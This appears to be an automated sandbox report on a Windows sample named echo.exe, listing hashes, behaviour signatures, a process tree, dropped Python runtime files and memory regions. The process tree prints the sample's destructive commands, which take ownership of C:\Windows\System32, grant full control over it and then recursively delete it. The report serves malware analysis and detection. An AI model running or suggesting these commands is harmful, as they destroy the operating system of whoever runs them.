Analysis

  • max time kernel
    105s
  • max time network
    100s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    01-12-2024 17:09

General

  • Target

    echo.exe

  • Size

    6.7MB

  • MD5

    7b1e3279d14ac07ea7fb16361afe7f38

  • SHA1

    34e4c3684f3cb150ce3123fed90a58d2256811ae

  • SHA256

    acb3c5f2dc857bdb2f721d673982981ff99004bb0d5b21801e032fdac00b1615

  • SHA512

    fba4de4a6653d4d39a8c7bfe8da4286e952be3828d4f5e6881229adde5b24a3a5f616dbb416d1b00e067a23f7a9afa8a37d71f684361a145e0815ca7c2b9b8c6

  • SSDEEP

    98304:gpv87WQRLP1e5dDwG1eFsr7/zPlcGxH0Ig17E3AAy5tx5KD/Swz1TOkKoS:uvWpefDwGcsztcGfcY3gtAL1Ck

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 2 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Drops file in System32 directory 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\echo.exe
    "C:\Users\Admin\AppData\Local\Temp\echo.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3152
    • C:\Users\Admin\AppData\Local\Temp\echo.exe
      "C:\Users\Admin\AppData\Local\Temp\echo.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4356
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "takeown /f C:\Windows\System32 /r /d y"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3600
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32 /r /d y
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:3232
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "icacls C:\Windows\System32 /grant administrators:F /t"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3436
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32 /grant administrators:F /t
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4928
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "rd /s /q C:\Windows\System32"
        3⤵
        • Drops file in Drivers directory
        • Drops file in System32 directory
        PID:2828
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
      PID:3760

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\_MEI31522\VCRUNTIME140.dll

      Filesize

      106KB

      MD5

      49c96cecda5c6c660a107d378fdfc3d4

      SHA1

      00149b7a66723e3f0310f139489fe172f818ca8e

      SHA256

      69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

      SHA512

      e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

    • C:\Users\Admin\AppData\Local\Temp\_MEI31522\_bz2.pyd

      Filesize

      82KB

      MD5

      4438affaaa0ca1df5b9b1cdaa0115ec1

      SHA1

      4eda79eaf3de614d5f744aa9eea5bfcf66e2d386

      SHA256

      ec91e2b4baca31b992d016b84b70f110ce2b1b2dfd54f5e5bef6270ed7d13b85

      SHA512

      6992107ac4d2108e477bc81af667b8b8e5439231e7e9f4b15ce4bce1aeea811bc0f1aaa438be3b0e38597760cb504367512809ee1937c4b538a86724ae543ba6

    • C:\Users\Admin\AppData\Local\Temp\_MEI31522\_decimal.pyd

      Filesize

      247KB

      MD5

      be315973aff9bdeb06629cd90e1a901f

      SHA1

      151f98d278e1f1308f2be1788c9f3b950ab88242

      SHA256

      0f9c6cc463611a9b2c692382fe1cdd7a52fea4733ffaf645d433f716f8bbd725

      SHA512

      8ea715438472e9c174dee5ece3c7d9752c31159e2d5796e5229b1df19f87316579352fc3649373db066dc537adf4869198b70b7d4d1d39ac647da2dd7cfc21e8

    • C:\Users\Admin\AppData\Local\Temp\_MEI31522\_hashlib.pyd

      Filesize

      63KB

      MD5

      1524882af71247adecf5815a4e55366a

      SHA1

      e25014c793c53503bdff9af046140edda329d01b

      SHA256

      6f7742dfdd371c39048d775f37df3bc2d8d4316c9008e62347b337d64ebed327

      SHA512

      5b954bb7953f19aa6f7c65ad3f105b77d37077950fb1b50d9d8d337bdd4b95343bac2f4c9fe17a02d1738d1f87eeef73dbbf5cdddcb470588cbc5a63845b188a

    • C:\Users\Admin\AppData\Local\Temp\_MEI31522\_lzma.pyd

      Filesize

      155KB

      MD5

      737119a80303ef4eccaa998d500e7640

      SHA1

      328c67c6c4d297ac13da725bf24467d8b5e982e3

      SHA256

      7158c1290ac29169160b3ec94d9c8bcde4012d67a555f325d44b418c54e2cc28

      SHA512

      1c9920e0841a65b01a0b339c5f5254d1039ef9a16fe0c2484a7e2a9048727f2cc081817aa771b0c574fb8d1a5a49dc39798a3c5e5b5e64392e9c168e1827be7c

    • C:\Users\Admin\AppData\Local\Temp\_MEI31522\_socket.pyd

      Filesize

      77KB

      MD5

      64a6c475f59e5c57b3f4dd935f429f09

      SHA1

      ca2e0719dc32f22163ae0e7b53b2caadb0b9d023

      SHA256

      d03fa645cde89b4b01f4a2577139fbb7e1392cb91dc26213b3b76419110d8e49

      SHA512

      cf9e03b7b34cc095fe05c465f9d794319aaa0428fe30ab4ddce14ba78e835edf228d11ec016fd31dfe9f09d84b6f73482fb8e0f574d1fd08943c1ec9e0584973

    • C:\Users\Admin\AppData\Local\Temp\_MEI31522\base_library.zip

      Filesize

      1.4MB

      MD5

      d900650a59899d8e54982ce705883f07

      SHA1

      d0778376cbf84d270419a748268f123e6b73ed3d

      SHA256

      7bd59461ad10f9695230d7e65cc7b81c2d9b1a269982240f128a24c56ad30a99

      SHA512

      1b13ea45a0603bf8cb0c7f013704f8d414decb02eb3bbe9263b7d0c3fbcb67bb767faf934fc4e64f1dc94c6597b58d6cf0b7e2e7d3c72f0e9ddf8f9f9dcab405

    • C:\Users\Admin\AppData\Local\Temp\_MEI31522\libcrypto-3.dll

      Filesize

      4.9MB

      MD5

      7a6a8c2a8c379b111cdceb66b18d687d

      SHA1

      f3b8a4c731fa0145f224112f91f046fddf642794

      SHA256

      8e13b53ee25825b97f191d77b51ed03966f8b435773fa3fbc36f3eb668fc569b

      SHA512

      f2ef1702df861ef55ef397ad69985d62b675d348cab3862f6ca761f1ce3ee896f663a77d7b69b286be64e7c69be1215b03945781450b186fc02cfb1e4cb226b5

    • C:\Users\Admin\AppData\Local\Temp\_MEI31522\python311.dll

      Filesize

      5.5MB

      MD5

      58e01abc9c9b5c885635180ed104fe95

      SHA1

      1c2f7216b125539d63bd111a7aba615c69deb8ba

      SHA256

      de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837

      SHA512

      cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081

    • C:\Users\Admin\AppData\Local\Temp\_MEI31522\select.pyd

      Filesize

      29KB

      MD5

      653bdccb7af2aa9ccf50cb050fd3be64

      SHA1

      afe0a85425ae911694c250ab4cb1f6c3d3f2cc69

      SHA256

      e24a3e7885df9a18c29ba058c49c3adcf59e4b58107847b98eca365b6d94f279

      SHA512

      07e841fda7a2295380bfa05db7a4699f18c6e639da91d8ee2d126d4f96e4cddaedbd490deb4d2a2e8e5877edfff877693f67a9dc487e29742943e062d7be6277

    • C:\Users\Admin\AppData\Local\Temp\_MEI31522\unicodedata.pyd

      Filesize

      1.1MB

      MD5

      1905b5d0f945499441e8cd58eb123d86

      SHA1

      117e584e6fcc0e8cfc8e24e3af527999f14bac30

      SHA256

      b1788b81fa160e5120451f9252c7745cdde98b8ce59bf273a3dd867bb034c532

      SHA512

      ed88cd7e3259239a0c8d42d95fa2447fc454a944c849fa97449ad88871236fefdafe21dbfa6e9b5d8a54ddf1d5281ec34d314cb93d47ce7b13912a69d284f522

    • memory/2828-47-0x00007FFF381A0000-0x00007FFF383A9000-memory.dmp

      Filesize

      2.0MB

    • memory/2828-48-0x00007FFF37620000-0x00007FFF376DD000-memory.dmp

      Filesize

      756KB

    • memory/2828-49-0x00007FFF35A40000-0x00007FFF35DB4000-memory.dmp

      Filesize

      3.5MB

    • memory/2828-50-0x00007FFF36040000-0x00007FFF360E3000-memory.dmp

      Filesize

      652KB

    • memory/2828-46-0x00007FF7067F0000-0x00007FF70685C000-memory.dmp

      Filesize

      432KB

    • memory/2828-51-0x00007FFF37750000-0x00007FFF37AC8000-memory.dmp

      Filesize

      3.5MB

    • memory/2828-53-0x00007FFF37D80000-0x00007FFF37EA0000-memory.dmp

      Filesize

      1.1MB

    • memory/2828-52-0x00007FFF35730000-0x00007FFF35841000-memory.dmp

      Filesize

      1.1MB

    • memory/3152-81-0x00007FFF37EA0000-0x00007FFF37F3E000-memory.dmp

      Filesize

      632KB

    • memory/3152-74-0x00007FFF35690000-0x00007FFF356B6000-memory.dmp

      Filesize

      152KB

    • memory/3152-24-0x00007FFF381A0000-0x00007FFF383A9000-memory.dmp

      Filesize

      2.0MB

    • memory/3152-25-0x00007FFF37620000-0x00007FFF376DD000-memory.dmp

      Filesize

      756KB

    • memory/3152-30-0x00007FFF38090000-0x00007FFF3813E000-memory.dmp

      Filesize

      696KB

    • memory/3152-70-0x00007FFF381A0000-0x00007FFF383A9000-memory.dmp

      Filesize

      2.0MB

    • memory/3152-34-0x00007FFF37500000-0x00007FFF3761E000-memory.dmp

      Filesize

      1.1MB

    • memory/3152-29-0x00007FFF35FA0000-0x00007FFF3603D000-memory.dmp

      Filesize

      628KB

    • memory/3152-33-0x00007FFF37750000-0x00007FFF37AC8000-memory.dmp

      Filesize

      3.5MB

    • memory/3152-27-0x00007FFF366B0000-0x00007FFF366D9000-memory.dmp

      Filesize

      164KB

    • memory/3152-32-0x00007FFF36FE0000-0x00007FFF37011000-memory.dmp

      Filesize

      196KB

    • memory/3152-31-0x00007FFF36040000-0x00007FFF360E3000-memory.dmp

      Filesize

      652KB

    • memory/3152-28-0x00007FFF35E80000-0x00007FFF35F92000-memory.dmp

      Filesize

      1.1MB

    • memory/3152-26-0x00007FFF35A40000-0x00007FFF35DB4000-memory.dmp

      Filesize

      3.5MB

    • memory/3152-72-0x00007FFF35A40000-0x00007FFF35DB4000-memory.dmp

      Filesize

      3.5MB

    • memory/3152-73-0x00007FFF37BD0000-0x00007FFF37D7C000-memory.dmp

      Filesize

      1.7MB

    • memory/3152-75-0x00007FFF366B0000-0x00007FFF366D9000-memory.dmp

      Filesize

      164KB

    • memory/3152-76-0x00007FFF35E80000-0x00007FFF35F92000-memory.dmp

      Filesize

      1.1MB

    • memory/3152-78-0x00007FFF35730000-0x00007FFF35841000-memory.dmp

      Filesize

      1.1MB

    • memory/3152-80-0x00007FFF36040000-0x00007FFF360E3000-memory.dmp

      Filesize

      652KB

    • memory/3152-82-0x00007FFF37D80000-0x00007FFF37EA0000-memory.dmp

      Filesize

      1.1MB

    • memory/3152-83-0x00007FFF36FE0000-0x00007FFF37011000-memory.dmp

      Filesize

      196KB

    • memory/3152-84-0x00007FFF32D80000-0x00007FFF32E2C000-memory.dmp

      Filesize

      688KB

    • memory/3152-85-0x00007FFF37750000-0x00007FFF37AC8000-memory.dmp

      Filesize

      3.5MB

    • memory/3152-86-0x00007FFF37500000-0x00007FFF3761E000-memory.dmp

      Filesize

      1.1MB

    • memory/3152-77-0x00007FFF35FA0000-0x00007FFF3603D000-memory.dmp

      Filesize

      628KB

    • memory/3760-88-0x00007FFF37620000-0x00007FFF376DD000-memory.dmp

      Filesize

      756KB

    • memory/4356-44-0x00007FFF34F80000-0x00007FFF34FA7000-memory.dmp

      Filesize

      156KB

    • memory/4356-68-0x00007FFF34F80000-0x00007FFF34FA7000-memory.dmp

      Filesize

      156KB

    • memory/4356-43-0x00007FFF36FE0000-0x00007FFF37011000-memory.dmp

      Filesize

      196KB

    • memory/4356-67-0x00007FFF36FE0000-0x00007FFF37011000-memory.dmp

      Filesize

      196KB

    • memory/4356-35-0x00007FFF381A0000-0x00007FFF383A9000-memory.dmp

      Filesize

      2.0MB

    • memory/4356-37-0x00007FFF35A40000-0x00007FFF35DB4000-memory.dmp

      Filesize

      3.5MB

    • memory/4356-69-0x00007FFF359C0000-0x00007FFF35A3F000-memory.dmp

      Filesize

      508KB

    • memory/4356-60-0x00007FFF35E80000-0x00007FFF35F92000-memory.dmp

      Filesize

      1.1MB

    • memory/4356-40-0x00007FFF35FA0000-0x00007FFF3603D000-memory.dmp

      Filesize

      628KB

    • memory/4356-45-0x00007FFF359C0000-0x00007FFF35A3F000-memory.dmp

      Filesize

      508KB

    • memory/4356-42-0x00007FFF36040000-0x00007FFF360E3000-memory.dmp

      Filesize

      652KB

    • memory/4356-61-0x00007FFF35FA0000-0x00007FFF3603D000-memory.dmp

      Filesize

      628KB

    • memory/4356-66-0x00007FFF37D80000-0x00007FFF37EA0000-memory.dmp

      Filesize

      1.1MB

    • memory/4356-65-0x00007FFF37EA0000-0x00007FFF37F3E000-memory.dmp

      Filesize

      632KB

    • memory/4356-64-0x00007FFF36040000-0x00007FFF360E3000-memory.dmp

      Filesize

      652KB

    • memory/4356-59-0x00007FFF366B0000-0x00007FFF366D9000-memory.dmp

      Filesize

      164KB

    • memory/4356-58-0x00007FFF35690000-0x00007FFF356B6000-memory.dmp

      Filesize

      152KB

    • memory/4356-57-0x00007FFF37BD0000-0x00007FFF37D7C000-memory.dmp

      Filesize

      1.7MB

    • memory/4356-54-0x00007FFF381A0000-0x00007FFF383A9000-memory.dmp

      Filesize

      2.0MB

    • memory/4356-56-0x00007FFF35A40000-0x00007FFF35DB4000-memory.dmp

      Filesize

      3.5MB

    • memory/4356-36-0x00007FFF37620000-0x00007FFF376DD000-memory.dmp

      Filesize

      756KB

    • memory/4356-38-0x00007FFF366B0000-0x00007FFF366D9000-memory.dmp

      Filesize

      164KB

    • memory/4356-39-0x00007FFF35E80000-0x00007FFF35F92000-memory.dmp

      Filesize

      1.1MB

    • memory/4356-41-0x00007FFF38090000-0x00007FFF3813E000-memory.dmp

      Filesize

      696KB

    • memory/4356-62-0x00007FFF35730000-0x00007FFF35841000-memory.dmp

      Filesize

      1.1MB